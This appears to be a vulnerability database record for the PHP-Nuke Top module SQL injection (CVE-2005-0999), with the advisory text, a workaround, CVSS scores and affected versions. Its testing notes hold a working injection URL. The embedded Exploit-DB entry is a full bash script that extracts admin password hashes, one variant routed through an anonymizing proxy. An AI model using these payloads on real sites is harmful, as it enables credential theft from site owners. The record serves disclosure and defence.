PHP-Nuke Top Module querylang Parameter SQL Injection
2005-04-06T07:49:20
ID OSVDB:15324 Type osvdb Reporter OSVDB Modified 2005-04-06T07:49:20
Description
Solution Description
Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Change the table prefix from the default "nuke_" to something random such as "zloqf7_".
Vendor URL: http://phpnuke.org
Secunia Advisory ID:14866
Other Advisory URL: http://www.waraxe.us/advisory-41.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0091.html
CVE-2005-0999
{"enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2017-04-28T13:20:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0999"]}, {"type": "exploitdb", "idList": ["EDB-ID:921"]}], "modified": "2017-04-28T13:20:11", "rev": 2}, "vulnersScore": 6.1}, "bulletinFamily": "software", "affectedSoftware": [], "references": [], "href": "https://vulners.com/osvdb/OSVDB:15324", "id": "OSVDB:15324", "title": "PHP-Nuke Top Module querylang Parameter SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "lastseen": "2017-04-28T13:20:11", "edition": 1, "reporter": "OSVDB", "description": "## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Change the table prefix from the default \"nuke_\" to something random such as \"zloqf7_\".\n## Manual Testing Notes\nhttp://[victim]/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION\n%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*\n## References:\nVendor URL: http://phpnuke.org\n[Secunia Advisory ID:14866](https://secuniaresearch.flexerasoftware.com/advisories/14866/)\nOther Advisory URL: http://www.waraxe.us/advisory-41.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0091.html\n[CVE-2005-0999](https://vulners.com/cve/CVE-2005-0999)\n", "modified": "2005-04-06T07:49:20", "viewCount": 2, "published": "2005-04-06T07:49:20", "cvelist": ["CVE-2005-0999"]}
{"cve": [{"lastseen": "2020-10-03T11:34:53", "description": "SQL injection vulnerability in the Top module for PHP-Nuke 6.x through 7.6 allows remote attackers to execute arbitrary SQL commands via the querylang parameter.", "edition": 3, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-0999", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0999"], "modified": "2016-10-18T03:16:00", "cpe": ["cpe:/a:francisco_burzi:php-nuke:6.5_rc3", "cpe:/a:francisco_burzi:php-nuke:6.5_rc1", "cpe:/a:francisco_burzi:php-nuke:7.6", "cpe:/a:francisco_burzi:php-nuke:6.0", "cpe:/a:francisco_burzi:php-nuke:6.5_rc2", "cpe:/a:francisco_burzi:php-nuke:6.6", "cpe:/a:francisco_burzi:php-nuke:6.7", "cpe:/a:francisco_burzi:php-nuke:6.5_final", "cpe:/a:francisco_burzi:php-nuke:7.0", "cpe:/a:francisco_burzi:php-nuke:7.4", "cpe:/a:francisco_burzi:php-nuke:6.5", "cpe:/a:francisco_burzi:php-nuke:7.5", "cpe:/a:francisco_burzi:php-nuke:6.9", "cpe:/a:francisco_burzi:php-nuke:6.5_beta1", "cpe:/a:francisco_burzi:php-nuke:7.1", "cpe:/a:francisco_burzi:php-nuke:7.3", "cpe:/a:francisco_burzi:php-nuke:7.2", "cpe:/a:francisco_burzi:php-nuke:7.0_final"], "id": "CVE-2005-0999", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0999", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:francisco_burzi:php-nuke:6.5_beta1:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.5_rc2:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.5_rc3:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.7:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.0_final:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.6:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.5_final:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.9:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:6.5_rc1:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:francisco_burzi:php-nuke:7.5:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T13:11:13", "description": "PHP-Nuke 6.x - 7.6 Top module Remote Sql Injection Exploit (working). CVE-2005-0999. Webapps exploit for php platform", "published": "2005-04-07T00:00:00", "type": "exploitdb", "title": "PHP-Nuke 6.x - 7.6 Top module Remote SQL Injection Exploit working", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0999"], "modified": "2005-04-07T00:00:00", "id": "EDB-ID:921", "href": "https://www.exploit-db.com/exploits/921/", "sourceData": "#/bin/bash\r\n\r\n# This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1\r\n# works thou /str0ke\r\n\r\n#\r\n# PHPNuke Top Module Remote SQL Injection\r\n# by Fabrizi Andrea 2005\r\n# andrea.fabrizi [at] gmail.com\r\n#\r\n# Work with the PHPNuke latest version! \r\n#\r\n\r\nURL=$1;\r\nPATH=\"$2/\";\r\nANON=\"http://anonymouse.ws/cgi-bin/anon-www.cgi/\";\r\n\r\n echo -e \"\\n PHPNuke Top Module Remote SQL Injection\" \r\n echo -e \" by Fabrizi Andrea 2005\"\r\n\r\nif [ \"$URL\" = \"\" ]; then\r\n\techo -e \"\\n USAGE: $0 [URL] [NukePath]\"\r\n\techo -e \" Example: $0 www.site.net phpNuke\\n\" \r\n\texit\r\nfi;\r\n\r\nif [ $PATH = \"/\" ]; then PATH=\"\"; fi;\r\n#anon_query_url=\"$ANON\"\"http://$URL/$PATH\"\"modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1\";\r\nanon_query_url=\"$ANON\"\"http://$URL/$PATH\"\"modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1\"; #changed line /str0ke\r\n\r\n#query_url=\"http://$URL/$PATH\"\"modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1\";\r\nquery_url=\"http://$URL/$PATH\"\"modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1\"; #changed line /str0ke\r\n\r\necho -e \"\\n - Anonymous Query URL: \"$anon_query_url \"\\n\";\r\necho -e \" - Direct Query URL: \" $query_url \"\\n\";\r\necho -e \" - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\\n\"\n\n# milw0rm.com [2005-04-07]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/921/"}]}
